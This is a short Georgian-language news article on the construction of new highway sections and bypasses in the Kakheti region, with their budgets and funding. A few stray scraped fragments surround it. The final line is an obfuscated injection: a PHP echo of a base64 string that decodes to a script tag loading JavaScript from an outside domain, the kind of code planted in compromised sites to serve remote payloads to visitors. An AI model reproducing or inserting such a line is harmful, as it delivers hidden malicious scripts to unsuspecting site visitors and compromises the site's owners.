celsiusi
ავერსი საქკაბელი
კახეთის რეგიონში ჩქაროსნული მაგისტრალის მშენებლობა აქტიურად მიმდინარეობს, რომლის დასრულების შემდეგბ თბილისიდან თელავამდე ჩასვლა 1სთ-სა და 20 წთ-ში იქნება შესაძლებელი.
 
როგორც საინფორმაციო სააგენტოს საავტომობილო გზების დეპარტამენტიდან აცნობეს, არსებული გზა გადის მჭიდროდ დასახლებულ სოფლებსა და ქალაქებში, ახალი გზა განტვირთავს მოძრაობას დასახლებულ პუნქტებში, გააუმჯობესებს უსაფრთხოების სტანდარტს და შეამცირებს მგზავრობის დროს.
 
თბილისი-საგარეჯოს 35 კმ-იანი გზის მშენებლობა პარალელურად 3 მონაკვეთზე მიმდინარეობს -  ვაზიანის შემოვლით გზაზე, ვაზიანი-საგარეჯოს მონაკვეთსა და საგარეჯოს შემოვლით გზაზე.
 
ვაზიანის შემოვლითი გზის დასრულება 2023 წელს, ხოლო დანარჩენი ორი მონაკვეთის - 2024 წელს იგეგმება. პროექტი სახელმწიფო ბიუჯეტიდან 527 169 937 ლარით ფინანსდება.
 
სამშენებლო სამუშაოები დაიწყო ბაკურციხე-წნორის შემოვლით გზაზეც, რომელიც გვერდს აუვლის მჭიდროდ დასახლებულ წნორსა და 6 მიმდებარე სოფელს. ახალი შემოვლითი გზა ალაზნის ველის მხარეს შენდება და თბილისი-ბაკურციხე-ლაგოდეხი-აზერბაიჯანის საზღვრის საერთაშორისო გზას დააკავშირებს არსებულ შიდასახელმწიფოებრივ გზასთან.
 
სამუშაოები აზიის განვითარების ბანკის 87.8 მილიონ ლარის ფინანსური მხარდაჭერით მიმდინარეობს. სატენდერო პროცედურები მიმდინარეობს საგარეჯო-ბადიაურის 17 კმ-იანი მონაკვეთის მშენებლობისთვისაც.
 
საერთო ჯამში, კახეთის საგზაო ქსელის განვითარებას 2 მილიარდი ლარი მოხმარდება. პროექტს საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს საავტომობილო გზების დეპარტამენტი ახორციელებს.
617
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");